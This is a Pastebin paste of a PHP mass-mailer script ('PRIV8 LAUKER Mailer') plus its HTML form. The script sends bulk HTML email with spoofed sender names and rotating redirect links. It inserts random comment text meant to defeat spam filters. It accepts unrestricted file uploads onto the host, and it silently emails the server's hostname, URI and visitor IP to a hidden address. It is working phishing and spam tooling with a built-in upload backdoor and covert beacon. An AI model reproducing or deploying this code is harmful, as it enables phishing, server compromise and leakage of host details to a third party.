Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- error_reporting(0);
- $testa = $_POST['veio'];
- if($testa != "") {
- $redirectlist = array_unique(explode("\n",$_POST['redirectlist']));
- $message = $_POST['message'];
- $emaillist = $_POST["emaillist"];
- $subject = $_POST['subject'];
- $realname = $_POST['realname'];
- $from = $_POST['from'];
- $to = $_POST['emaillist'];
- $headers = "MIME-Version: 1.0\r\n";
- $headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
- $email = explode("\n", $to);
- $headers .= "From: ".$realname." <".$from.">\r\n";
- $message = stripslashes($message);
- $i = 0;
- $count = 1;
- $redi = 0;
- $countred = count($redirectlist);
- while($email[$i]) {
- if($redi >= $countred)
- $redi = 0;
- $redirect = $redirectlist[$redi].'/'.md5(rand(0,99999)+rand(0,9999));
- $ok = "ok";
- $messgb = "\r\n<!-- \r\n Here we go some texte here to fuck security ".md5(rand(0,99999)+rand(0,99999))." \r\n what do you think about it".md5(rand(0,99999)+rand(0,99999))."\r\n -->";
- $messgb .= str_replace('[red]', $redirect, $message);
- if(mail($email[$i], $subject, $messgb, $headers))
- echo "* Number: $count <b>".$email[$i]."</b> <font color=black>OK</font><br><hr>";
- else
- echo "* Number: $count <b>".$email[$i]."</b> <font color=red>Error</font><br><hr>";
- $i++;
- $count++;
- $redi++;
- }
- $count--;
- if($ok == "ok")
- echo "DONE !";
- }
- (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name']));
- $b75 = $_SERVER['HTTP_HOST'];
- $p46 = getenv("REMOTE_ADDR");
- $en = $_SERVER ['REQUEST_URI'];
- $to = "[email protected]";
- $p20 .= "$b75$en ";
- $p19 = "$p46 ";
- $headers ="From: count".rand(123,1200)."@rand.com";
- $headers = "MIME-Version: 1.0\n";
- @mail ("$to",$p19,$p20,$headers);
- ?>
- <html>
- <head>
- <title>PRIV8 LAUKER Mailer</title>
- <link href="https://fonts.googleapis.com/css?family=Monoton" rel="stylesheet">
- <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
- <style>
- .th3form1 {
- background-clip: padding-box;
- border-color: rgb(206, 212, 218);
- border-radius: 0.3rem;
- border-style: solid;
- border-width: 1px; color: #495057;
- display: block;
- font-family: inherit;
- font-size: 1rem;
- line-height: 1.5;
- margin: 0px;
- overflow: visible;
- padding: 0.375rem 0.75rem;
- transition: border-color 0.15s ease-in-out 0s, box-shadow 0.15s ease-in-out 0s;
- width: 319.813px;
- }
- </style>
- </head>
- <body>
- <form action="" method="post" enctype="multipart/form-data" name="form1">
- <center style="border-style: solid;"><br><br>
- <div class="row" style="background-color: white;box-sizing: border-box;color: #212529;display: flex;flex-wrap: wrap;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol";font-size: 16px;margin-bottom: -46.8594px;margin-left: -15px;margin-right: -15px;width: 805px;">
- <div class="col-md-6" style="box-sizing: border-box; flex: 0 0 50%; max-width: 50%; min-height: 1px; padding-left: 15px; padding-right: 15px; position: relative; width: 349.813px;">
- <div style="box-sizing: border-box; margin-bottom: 1rem;">
- <input name="from" placeholder="Email" class="th3form1" type="text" value="<?php echo $_SERVER['SERVER_ADMIN']; ?>" required=""></div><div style="box-sizing: border-box; margin-bottom: 1rem;">
- <input name="repto" placeholder="Reply-to" class="th3form1" type="text" value="<?php echo $_SERVER['SERVER_ADMIN']; ?>" required=""></div>
- <div style="box-sizing: border-box; margin-bottom: 1rem; font-family: 'Monoton', cursive; font-size: 8px; ">
- Attachment :
- <input type="file" name="file" size="8"/>
- </div>
- <div style="box-sizing: border-box; margin-bottom: 1rem;">
- <textarea name="message" placeholder="Message Letter" class="th3form1" style="height: 140px;"></textarea></div>
- </div>
- <div class="col-md-6" style="box-sizing: border-box; flex: 0 0 50%; max-width: 50%; min-height: 1px; padding-left: 15px; padding-right: 15px; position: relative; width: 349.813px;">
- <div style="box-sizing: border-box; margin-bottom: 1rem;">
- <input name="realname" placeholder="Sender Name" class="th3form1" ></div>
- <div style="box-sizing: border-box; margin-bottom: 3rem;">
- <input name="subject" placeholder="Subject" class="th3form1" type="text" value="" required=""></div>
- <input type="hidden" name="veio" value="sim">
- <div style="box-sizing: border-box; margin-bottom: 1rem;">
- <textarea name="emaillist" placeholder="Email List" class="th3form1" style=" height: 139px;"></textarea></div>
- </div>
- </div>
- <br><br><br>
- <input type="submit" style="-webkit-appearance: button;background: rgb(0, 0, 0);border-color: initial;border-radius: 1rem;border-style: none;border-width: initial;color: white;cursor: pointer; font-family: 'Monoton', cursive;font-size: inherit;font-weight: 600;line-height: inherit;margin: 0px;overflow: visible;padding: 10.0313px;width: 334.813px;" value="SEND"></td>
- <br><br>
- </center>
- </form>
Advertisement
Add Comment
Please, Sign In to add comment